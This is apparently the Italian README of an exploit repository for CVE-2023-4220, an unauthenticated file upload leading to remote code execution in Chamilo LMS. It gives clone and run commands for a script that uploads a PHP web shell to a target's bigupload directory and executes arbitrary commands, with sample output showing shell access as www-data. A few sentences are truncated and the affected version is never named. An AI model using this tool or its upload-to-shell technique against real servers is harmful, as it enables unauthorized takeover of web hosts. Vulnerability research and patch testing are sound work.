
(CVE-2023-4220) Chamilo LMS Esecuzione Remota di Codice tramite Caricamento di File di Grandi Dimensioni non Autenticato
Questa repository contiene un proof-of-concept (PoC) per la vulnerabilità identificata come CVE-2023-4220 in Chamilo LMS. Questo exploit sfrutta una vulnerabilità di upload di file non autenticato, consentendo a un attaccante remoto di eseguire codice arbitrario sul sistema interessato.
Esclusione di responsabilità: Questo codice è solo a scopo educativo e di ricerca. L'autore non è responsabile per qualsiasi uso improprio di questo codice.
Le versioni di Chamilo LMS precedenti a questa release sono vulnerabili a questo problema. La vulnerabilità deriva da una validazione e gestione impropria degli upload di file, consentendo agli attaccanti di caricare ed eseguire file dannosi sul server.
Questo exploit prende di mira la funzionalità di upload file in Chamilo LMS. Creando un file dannoso contenente codice PHP e caricandolo tramite un endpoint non autenticato, un attaccante può eseguire comandi arbitrari sul server.
git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
Esegui l'exploit passando l'URL di destinazione e il comando che desideri eseguire come argomenti:
python exploit.py <url_destinazione> <comando>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
Questo comando:
Se ha successo, lo script produrrà:
Ad esempio:
[+] File caricato con successo!
[+] Accedi alla shell su: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Output del comando: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Questo progetto è concesso in licenza con la Licenza MIT.
Per qualsiasi domanda o problema, apri un issue su questa repository o contattami all'indirizzo [medkamelbouzekria - at - gmail -dot - com].